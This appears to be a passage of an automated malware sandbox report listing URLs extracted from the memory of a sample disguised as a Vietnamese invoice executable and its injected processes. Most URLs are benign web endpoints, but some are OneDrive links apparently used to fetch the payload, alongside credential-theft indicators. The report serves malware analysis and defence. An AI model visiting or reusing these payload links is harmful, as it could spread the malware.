Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: aspnet_compiler.exe, 00000010.00000002.374830340.00000000009EA000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001B.00000002.392736661.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000020.00000002.416712597.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000024.00000002.432581722.0000000000EFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/
Source: aspnet_compiler.exe, 00000029.00000002.453919934.000000000135A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/B
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/
Source: aspnet_compiler.exe, 0000000E.00000003.388842971.0000000002746000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401780181.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405195939.0000000002A86000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436504638.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433788536.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463221264.0000000003003000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.466714622.0000000003006000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.487705843.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481529759.00000000028A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.504317340.0000000000A46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500729020.0000000000A43000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386489638.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: bhv8995.tmp.39.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: aspnet_compiler.exe, 0000000E.00000002.397869869.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.477360003.0000000000FB4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.502161495.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000002.513031021.00000000001B3000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: aspnet_compiler.exe, 0000001D.00000002.452238930.0000000000AF4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldll
Source: aspnet_compiler.exe, 00000013.00000002.420022464.0000000000AF4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldllD
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.387362891.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000002.399020407.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405740742.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401873684.000000000120A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401655529.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000002.422082458.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000002.455045363.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436842526.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433912633.000000000115A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433511256.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.480242227.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.467030743.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463006657.000000000300F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463367055.000000000148A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481760272.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.488827265.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481292516.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.504901021.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4m6O4Ornh9bC3LU6E6AhRMu7htyE0P8yda7QdnFwV6RfxyvsjxNs5Be-VablD5fo4Z
Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3
Source: Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mohw2-jA2-enkz0nKTLzUjPRBNoO5ZAah_FcRnfkog9p26ZH43g9AnI4ZgfSnm5Rt
Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com45k
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com45kT
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: aspnet_compiler.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
